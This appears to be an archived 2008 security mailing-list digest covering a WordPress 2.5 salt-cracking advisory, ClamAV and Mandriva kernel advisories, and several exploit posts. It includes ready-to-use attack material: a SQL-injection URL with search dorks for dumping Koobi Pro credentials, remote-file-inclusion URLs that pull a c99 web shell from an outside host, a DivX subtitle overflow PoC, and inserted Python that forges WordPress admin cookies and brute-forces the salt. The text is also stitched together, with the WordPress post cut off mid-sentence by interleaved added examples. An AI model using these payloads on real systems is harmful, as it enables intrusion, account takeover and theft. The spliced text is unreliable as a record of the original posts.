---
http://xiam.menteslibres.org/pages/advisories/wordpress-2-5-salt-cracking-vulnerability
   By J. Carlos Nieto [EMAIL PROTECTED] 
http://xiam.menteslibres.org


Severity
========
Medium. It affects only a determinate part of the WordPress users under
specific conditions.

Affected software
=================
WordPress 2.5

Vulnerability conditions
========================
After the initial WordPress installation, the wp-config.php's SECRET_KEY
must remain at the default value 'put your unique phrase here' or be
undefined; the default value remains untouched after installing via a
browser.
When the WordPress package is unpacked and the victim is ready to
install it, he will be asked to read the manual in order to create a
wp-config.php file, or to change permissions for the installation
directory to be writable. If he chooses to change directory permissions,
the installation will be completed entirely via the web and the SECRET_KEY
will remain at the default value.
There exist some other conditions that let the user install WordPress
without even knowing that he must change the SECRET_KEY in wp-config.php:


1.- If the user attempts to install WordPress on Windows, since Windows
does not have a strong permissions check.
2.- If the user attempts to install WordPress under Apache + suexec. The
files are not readable or writable for all other users, but writable for
the user himself. Thus the installer won't ask you to read the manual.
3.- Some hosting companies have a one-click installer that does not
set up a SECRET_KEY.

4.- You failed to read the whole installation manual.


Vulnerable scripts
==================
wp-includes/pluggable.php
function wp_validate_auth_cookie($cookie) {
 ...
 // The cookie is not being validated.
 list($username, $expiration, $hmac) = explode('|', $cookie);
 ...
 // I could send 99 as the second argument of the cookie to 
skip this condition.

 if ( $expired < time() )
   return false;
 ...

 // A mysterious hash is used here, the hash becomes a seven
 // character word generated by wp_generate_password()
 // (a.k.a. SECRET_SALT), note that wp_salt() sets
 // $secret_key to null if SECRET_KEY is equal to the default value.
.
 // The argument passed to wp_hash() in the next line is
 // completely poisonable.

 // To gain admin privileges I could use:
 // 'admin|99|MISTERIOUSHASH' as my cookie.
 $key = wp_hash($username . $expiration);
 $hash = hash_hmac('md5', $username . $expiration, $key);

 // A weak check, I may provide a custom $hmac by knowing
 // the wp_salt()'s value.
 if ( $hmac != $hash )
   return false;

 // There is no password check, not even IP verification
 $user = get_userdatabylogin($username);
}
...
function wp_salt() {
 global $wp_default_secret_key;
 $secret_key = '';
   
 // If the key is null, not defined or has the default

 // value $secret_key remains null
 if ( defined('SECRET_KEY') && ('' != SECRET_KEY) && ( $wp_default_secret_key != SECRET_KEY) )
   $secret_key = SECRET_KEY;

 if ( defined('SECRET_SALT') ) {
   $salt = SECRET_SALT;
 } else {
   $salt = get_option('secret');
   if ( empty($salt) ) {
 $salt = wp_generate_password();
   update_option('secret', $salt);
 }
   }
   
 // $salt is a seven char long password. $secret_key is null.

 return apply_filters('salt', $secret_key . $salt);
}

The wp_salt()'s value is stored here:

mysql> select * from wp_options where option_name = 'secret';
+---+-+-+--+--+
| option_id | blog_id | option_name | option_value | autoload |
+---+-+-+--+--+
|61 |   0 | secret  | eat5fsE  | yes  |
+---+-+-+--+--+
1 row in set (0.00 sec)

So if the attacker gets the value of that seven length string he can
craft a special cookie and gain access to ANY account he wants.

How can I know the value of wp_salt()?
--------------------------------------
I am thinking of two ways to get the value of the wp_salt():
1.- Gain access to the WP database by using a SQL injection (such as the
GBK encoding and addslashes() issue) on the WordPress core itself or on
a third party plugin (the latter is more likely to be possible). I didn't
find any user-level SQL injection on the WP core.
2.- Register yourself on a WP 2.5 blog, log in and grab the cookie named
wordpress_MD5(SITE_URL), try to crack the value of the wp_salt() with an
offline attack using a specialized program.


Possible solution
=================
Read The Fabulous Manual (a.k.a. RTFM) and realize that you have to 
change the SECRET_KEY's value.

The SECRET_KEY should be changed automatically to something random.

Proof of concept
================
I wrote a bruteforce HMAC-MD5 cracker and adapted it to crack 
wp_salt()'s values using a legitimate cookie as an argument.


This is the output of 
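
The following Python is an added example; it is neither the advisory author's cracker nor WordPress code. It mirrors wp_salt(), wp_hash() and the cookie check quoted above in the vulnerable configuration (SECRET_KEY at its default, so the whole salt is the seven-character 'secret' option), forges an admin cookie once the salt is known, and runs the offline search of step 2 against one legitimate cookie. The salt eat5fsE is the value from the advisory's database dump; the far-future expiration, the short salt used for the search demonstration and the user names are constructed for the example.

```python
import hashlib
import hmac
import itertools
import time
from typing import Optional

DEFAULT_SECRET_KEY = "put your unique phrase here"   # $wp_default_secret_key


def wp_salt(secret_key: Optional[str], secret: str) -> str:
    """Mirror of wp_salt(): SECRET_KEY contributes only if it is defined,
    non-empty and not the default. Otherwise the whole salt is the short
    'secret' option value."""
    if not secret_key or secret_key == DEFAULT_SECRET_KEY:
        secret_key = ""
    return secret_key + secret


def wp_hash(data: str, salt: str) -> str:
    """wp_hash($data) = hash_hmac('md5', $data, wp_salt()), hex-encoded."""
    return hmac.new(salt.encode(), data.encode(), hashlib.md5).hexdigest()


def cookie_mac(username: str, expiration: int, salt: str) -> str:
    """The two-stage HMAC from wp_validate_auth_cookie(): the first HMAC's
    hex digest is the key of the second."""
    data = username + str(expiration)
    key = wp_hash(data, salt)
    return hmac.new(key.encode(), data.encode(), hashlib.md5).hexdigest()


def make_auth_cookie(username: str, expiration: int, salt: str) -> str:
    """Anyone who knows the salt can mint 'user|expiration|hmac' for any user."""
    return "%s|%d|%s" % (username, expiration, cookie_mac(username, expiration, salt))


def validate_auth_cookie(cookie: str, salt: str, now: Optional[float] = None) -> Optional[str]:
    """Port of the check quoted in the advisory; returns the username or None.
    Only the expiration and the HMAC are examined, exactly as in the original."""
    username, expiration, mac = cookie.split("|")
    if int(expiration) < (time.time() if now is None else now):
        return None
    if not hmac.compare_digest(mac, cookie_mac(username, int(expiration), salt)):
        return None
    return username


def crack_salt(cookie: str, alphabet: str, length: int) -> Optional[str]:
    """Offline search for the salt from one legitimate cookie (the advisory's
    step 2). Each candidate costs two HMAC-MD5 operations and no server
    contact. A full seven-character alphanumeric salt is 62**7 candidates;
    the caller bounds the search, and the test below uses a deliberately
    small constructed salt."""
    username, expiration, mac = cookie.split("|")
    for cand in itertools.product(alphabet, repeat=length):
        salt = "".join(cand)
        if cookie_mac(username, int(expiration), salt) == mac:
            return salt
    return None


FAR_FUTURE = 9999999999   # constructed: any expiration after "now" passes the check

if __name__ == "__main__":
    salt = wp_salt(DEFAULT_SECRET_KEY, "eat5fsE")       # value from the advisory's dump
    print(make_auth_cookie("admin", FAR_FUTURE, salt))  # forged without any password
```

A real SECRET_KEY defeats the search: the HMAC key then contains a long phrase the attacker cannot enumerate, which is why the advisory's fix is simply to set one.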

Koobi Pro 6.25 poll Remote SQL Injection Vulnerability

2008-04-15 Thread Sabun
##

#

# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability

#

##

#

##AUTHOR : [EMAIL PROTECTED]

#

HOME : http://www.r57shell.in

##WEBSiTE: http://www.xcorpitx-hack.com/Forum/

BLOG : http://my.opera.com/SQL-Injection/blog/

MAiL : [EMAIL PROTECTED]

#

###

#

# DORK 1 : allinurl: index.php?p=pollshowresult

#

# DORK 2 : allinurl: poll_id showresult

#

###

EXPLOiT :


index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user


*

WEBSiTE: http://www.xcorpitx-hack.com/Forum

*

[EMAIL PROTECTED]

*


remote file include

2008-04-15 Thread win32 . exe
#

W2B Online Banking Remote File Inclusion Vulnerability

#



## AUTHOR: THuM4N

## Email : [EMAIL PROTECTED]


## Script : W2B Online Banking 


## Site   : http://www.w2b.ru


## Vulnerable CODE :

~~/index.php ~~

{

include($_SESSION['ilang']."/".$_REQUEST['page'].".htm");

~~~



## EXPLOIT :

http://[HOST]/[Path]/index.php?ilang=http://yoursite.com/c99.txt?

 

 or


http://[HOST]/?ilang=http://yoursite.com/c99.txt?



## SPECIAL GREETZ : 2 All MUSLIM HACKERS.

## AND BIGUP 2 All Attackers Around The World .


#

  W2B Online Banking Remote File Inclusion Vulnerability

#


# milw0rm.com [2008-04-15]


iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability

2008-04-15 Thread iDefense Labs

iDefense Security Advisory 04.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 14, 2008

I. BACKGROUND

Clam AntiVirus is a multi-platform GPL anti-virus toolkit. ClamAV is
often integrated into e-mail gateways and used to scan e-mail traffic
for viruses. It supports virus scanning for a wide variety of packed
Portable Executable (PE) binaries. WWPack is one of the supported
packers. For more information visit the vendor's web site at the
following URL.

http://www.clamav.net/

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Clam AntiVirus'
ClamAV, as included in various vendors' operating system distributions,
allows attackers to execute arbitrary code with the privileges of the
affected process.

The vulnerability exists within the code responsible for reading in
sections within a PE binary packed with the WWPack executable
compressor. See the following excerpt from libclamav/pe.c:

 1879      dsize = max-min+headsize-exe_sections[nsections - 1].rsz;

 1883      if((dest = (char *) cli_calloc(dsize, sizeof(char))) == NULL) {

 1897      for(i = 0 ; i < (unsigned int)nsections-1; i++) {
 1898          if(exe_sections[i].rsz) {
 1899              if(!cli_seeksect(desc, exe_sections[i]) ||
                       (unsigned int) cli_readn(desc, dest + headsize + exe_sections[i].rva - min,
                                                exe_sections[i].rsz) != exe_sections[i].rsz) {


The size of the allocated heap buffer is calculated on line 1879 using
several values that are under attacker control. The allocation takes
place on line 1883. Within the loop, starting on line 1897, data is
read into the allocated buffer (line 1899).

No validation is done to ensure that the resulting data is not written
outside the bounds of the dest buffer. The headsize,
exe_sections[i].rva, min, and exe_sections[i].rsz values that are
used for this operation are all under attacker control. As such, an
exploitable heap corruption condition may occur.
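The check that is missing in front of the cli_readn() call, as an added illustration that is neither iDefense's nor ClamAV's code: section_fits(), load_section() and struct wwpack_section are hypothetical names, the struct models only the rva and rsz values the advisory names, and the arithmetic is carried out in 64 bits so that a 32-bit sum of attacker-controlled headsize, rva, min and rsz cannot wrap around and pass the comparison against dsize.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical mirror of the two section fields the advisory names;
 * this is not ClamAV's exe_sections[] structure. */
struct wwpack_section {
    uint32_t rva;   /* relative virtual address of the section */
    uint32_t rsz;   /* raw size taken from the section header  */
};

/*
 * dest is laid out as [0, headsize) for the header, then each section at
 * offset headsize + rva - min with rsz bytes.  Returns true only if that
 * whole range lies inside the dsize-byte buffer.  Every step is checked
 * so a wrapped 32-bit sum cannot slip past the final comparison.
 */
bool section_fits(uint32_t headsize, uint32_t min, uint32_t dsize,
                  const struct wwpack_section *s)
{
    if (s->rsz == 0)
        return true;            /* nothing is written for an empty section */
    if (s->rva < min)
        return false;           /* headsize + rva - min would underflow     */
    uint64_t off = (uint64_t)headsize + (s->rva - min);
    uint64_t end = off + s->rsz;
    return end <= dsize;        /* 64-bit math: no wrap-around is possible  */
}

/* Copy a section into dest from a constructed source blob only if it fits.
 * Stands in for the cli_readn() call in the excerpt.  Returns the number of
 * bytes copied, or -1 when the section is rejected. */
long load_section(char *dest, uint32_t dsize, uint32_t headsize, uint32_t min,
                  const struct wwpack_section *s, const unsigned char *src)
{
    if (!section_fits(headsize, min, dsize, s))
        return -1;
    memcpy(dest + headsize + (s->rva - min), src, s->rsz);
    return (long)s->rsz;
}

int main(void)
{
    char dest[64];
    unsigned char blob[16] = "SECTIONPAYLOAD!";            /* constructed data */
    struct wwpack_section ok   = { .rva = 0x1000, .rsz = 16 };   /* fits        */
    struct wwpack_section bad  = { .rva = 0x1030, .rsz = 16 };   /* past end    */
    struct wwpack_section wrap = { .rva = 0xFFFFFFF0, .rsz = 0x20 }; /* 32-bit wrap */

    printf("ok:   %ld\n", load_section(dest, sizeof dest, 8, 0x1000, &ok, blob));
    printf("bad:  %ld\n", load_section(dest, sizeof dest, 8, 0x1000, &bad, blob));
    printf("wrap: %ld\n", load_section(dest, sizeof dest, 8, 0, &wrap, blob));
    return 0;
}
```

The third case is the one a 32-bit check of the form `headsize + rva - min + rsz <= dsize` would get wrong: 0xFFFFFFF0 + 8 + 0x20 wraps to 0x18, which is smaller than dsize, while the 64-bit sum is correctly rejected.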

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the process using libclamav. In the case of
the clamd program, this will result in code execution with the
privileges of the clamav user. Unsuccessful exploitation results in the
clamd process crashing.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in ClamAV
0.92.1. Previous versions may also be affected.

V. WORKAROUND

Disabling the scanning of PE files will prevent exploitation.

 If using clamscan, this can be done by running clamscan with the 
'--no-pe' option.
 If using clamdscan, set the 'ScanPE' option in the clamd.conf file to 
'no'.


VI. VENDOR RESPONSE



VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

03/04/2008  Initial vendor notification
03/06/2008  Initial vendor response
04/14/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Damian Put and Thomas
Pollet.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


remote file include

2008-04-15 Thread win32 . exe
#

Istant-Replay Forum  Remote File Inclusion Vulnerability

#



## AUTHOR: THuGM4N

## Email : [EMAIL PROTECTED]


## Script : Istant-Replay Forum  


## Site   : http://www.chattaitaliano.com


## Vulnerable CODE :

~~/read.php ~~

$a = $_GET['data'];

$b = $_GET['post'];


$foo = include $a.".txt";

~~~



## BUT THE EXPLOIT IS LIKE THAT  :


http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?

 


##  BIGUP 2 All Attackers Around The World .


#

  Istant-Replay Forum  Remote File Inclusion Vulnerability

#




DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )

2008-04-15 Thread securfrog
# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )

# Bug: When parsing a subtitle file with an overly long subtitle, DIVX player 
# will crash with EIP overwritten.

# Replace MOVIE_FILENAME by your movie filename ( .avi )

#

#!/usr/local/bin/perl
use strict;
use warnings;

# the .srt must carry the same base name as the movie file
my $file = "MOVIE_FILENAME.srt";

# a single 4096-byte subtitle line
my $payload = "A" x 4096;

open( my $fh, '>', $file ) or die "Cannot open $file: $!";

# one SRT cue: index, timing line, subtitle text
print $fh "1\n";
print $fh "00:00:01,001 --> 00:00:02,001\n";
print $fh $payload;

close($fh);

print "$file has been created\n";
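The bug class behind this PoC from the parser's side, as an added defensive example that is neither securfrog's nor DivX's code: a bounded SRT cue reader that refuses an overlong subtitle line instead of copying it into a fixed-size buffer. struct srt_cue, MAX_SUBTITLE_TEXT (256 bytes, an assumed limit; DivX's real buffer size is not stated in the post), copy_line(), parse_srt_cue() and parse_generated_cue() are hypothetical names, and the cue that parse_generated_cue() builds is constructed to have the same shape as the PoC file.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SUBTITLE_TEXT 256   /* assumed limit, not DivX's actual size */

/* A parsed cue with a fixed-size text field: the kind of buffer an
 * unchecked copy of a 4096-byte line overruns. */
struct srt_cue {
    unsigned index;
    char start[13];             /* "HH:MM:SS,mmm" plus NUL */
    char end[13];
    char text[MAX_SUBTITLE_TEXT];
};

/* Copy one line (up to '\n' or end of input) into dst of capacity cap.
 * Returns the line length, or -1 if the line would not fit; in that
 * case nothing is written to dst at all. */
static long copy_line(char *dst, size_t cap, const char *src, const char **next)
{
    const char *nl = strchr(src, '\n');
    size_t len = nl ? (size_t)(nl - src) : strlen(src);
    if (len >= cap)
        return -1;              /* overlong: reject instead of overflowing */
    memcpy(dst, src, len);
    dst[len] = '\0';
    *next = nl ? nl + 1 : src + len;
    return (long)len;
}

/* Parse the first cue of an in-memory SRT blob.  Returns 0 on success and
 * -1 on malformed or overlong input.  Length is checked before every copy,
 * so the subtitle text can never exceed sizeof cue->text - 1. */
int parse_srt_cue(const char *srt, struct srt_cue *cue)
{
    char line[64];
    const char *p = srt;

    if (copy_line(line, sizeof line, p, &p) < 0)
        return -1;
    cue->index = (unsigned)strtoul(line, NULL, 10);

    if (copy_line(line, sizeof line, p, &p) < 0)
        return -1;
    if (sscanf(line, "%12s --> %12s", cue->start, cue->end) != 2)
        return -1;

    if (copy_line(cue->text, sizeof cue->text, p, &p) < 0)
        return -1;
    return 0;
}

/* Build a cue whose text line is text_len 'A' bytes (the PoC's shape) and
 * run it through the parser.  Returns the parser's result. */
int parse_generated_cue(size_t text_len)
{
    char *buf = malloc(text_len + 64);
    if (!buf)
        return -1;
    int n = sprintf(buf, "1\n00:00:01,001 --> 00:00:02,001\n");
    memset(buf + n, 'A', text_len);
    buf[n + text_len] = '\0';

    struct srt_cue cue;
    int rc = parse_srt_cue(buf, &cue);
    free(buf);
    return rc;
}

int main(void)
{
    printf("10-byte subtitle:   %d\n", parse_generated_cue(10));    /* accepted */
    printf("4096-byte subtitle: %d\n", parse_generated_cue(4096));  /* rejected */
    return 0;
}
```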


[ MDVSA-2008:086 ] - Updated kernel packages fix vulnerability

2008-04-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:086
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: April 15, 2008
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 The isdn_ioctl function in isdn_common.c in the Linux kernel prior to
 2.6.23 allows local users to cause a denial of service via a crafted
 ioctl struct in which iocts is not null terminated, which triggers a
 buffer overflow (CVE-2007-6151).
 
 The do_coredump function in fs/exec.c in the Linux kernel prior to
 2.6.24-rc3 did not change the UID of a core dump file if it exists
 before a root process creates a core dump in the same location, which
 could possibly allow local users to obtain sensitive information
 (CVE-2007-6206).
 
 The shmem_getpage function in mm/shmem.c in the Linux kernel versions
 2.6.11 through 2.6.23 did not properly clear allocated memory in
 certain rare circumstances related to tmpfs, which could possibly
 allow local users to read sensitive kernel data or cause a crash
 (CVE-2007-6417).
 
 Additionally, this kernel provides a fix for megaraid_sas and updates
 it to version 3.13, updates mptsas to version 3.12.19, and updates
 e1000-ng to version 7.6.12, as well as adds igb version 1.0.8.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6151
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6206
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6417
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 4ecd928352ae1a0e37af030841e1daca  corporate/4.0/i586/kernel-2.6.12.34mdk-1-1mdk.i586.rpm
 e25d7be22e3e194dd1f50409d0e71b90  corporate/4.0/i586/kernel-BOOT-2.6.12.34mdk-1-1mdk.i586.rpm
 e42a62385fd608bf8d9b3ec62d6684e8  corporate/4.0/i586/kernel-doc-2.6.12.34mdk-1-1mdk.i586.rpm
 0522dc2efc14a6fb456bed196e5ef87e  corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.34mdk-1-1mdk.i586.rpm
 723df91e8a94e9e4654a30875fe9de94  corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.34mdk-1-1mdk.i586.rpm
 b276ba8700f7e611bfdf02b3b26c4796  corporate/4.0/i586/kernel-smp-2.6.12.34mdk-1-1mdk.i586.rpm
 0a369c5c6e085596c2fa579074e0eed0  corporate/4.0/i586/kernel-source-2.6.12.34mdk-1-1mdk.i586.rpm
 53e34bb761dbf927ec911248aee1f23b  corporate/4.0/i586/kernel-source-stripped-2.6.12.34mdk-1-1mdk.i586.rpm
 c10f59cf9d289f0e9e8cdeb4e7fb3f0e  corporate/4.0/i586/kernel-xbox-2.6.12.34mdk-1-1mdk.i586.rpm
 90a86dd0e5fb9d62edd9682f5a86f978  corporate/4.0/i586/kernel-xen0-2.6.12.34mdk-1-1mdk.i586.rpm
 af3beaab8bf06f0beef21158e5d6878e  corporate/4.0/i586/kernel-xenU-2.6.12.34mdk-1-1mdk.i586.rpm
 5137cdde7b33a50562d783ee93bfa608  corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm

 Corporate 4.0/X86_64:
 371f8a2b038bbe058dea1666b3b186da  corporate/4.0/x86_64/kernel-2.6.12.34mdk-1-1mdk.x86_64.rpm
 c7c9bfe79048fb2f94ca600ddd2da911  corporate/4.0/x86_64/kernel-BOOT-2.6.12.34mdk-1-1mdk.x86_64.rpm
 a27a0da5b9e28ce0193a83a75e6e73c8  corporate/4.0/x86_64/kernel-doc-2.6.12.34mdk-1-1mdk.x86_64.rpm
 7615a2c0aee3363886f159f4bfc5f538  corporate/4.0/x86_64/kernel-smp-2.6.12.34mdk-1-1mdk.x86_64.rpm
 0e896d19f066f836fcfb7dd470522d0c  corporate/4.0/x86_64/kernel-source-2.6.12.34mdk-1-1mdk.x86_64.rpm
 b09194d6e8a07b1ae836be6335808464  corporate/4.0/x86_64/kernel-source-stripped-2.6.12.34mdk-1-1mdk.x86_64.rpm
 6845355d4579b2f2933935c88567981b  corporate/4.0/x86_64/kernel-xen0-2.6.12.34mdk-1-1mdk.x86_64.rpm
 f0e8c8777c6da9db4dbea6de1b0fc920  corporate/4.0/x86_64/kernel-xenU-2.6.12.34mdk-1-1mdk.x86_64.rpm
 5137cdde7b33a50562d783ee93bfa608  corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)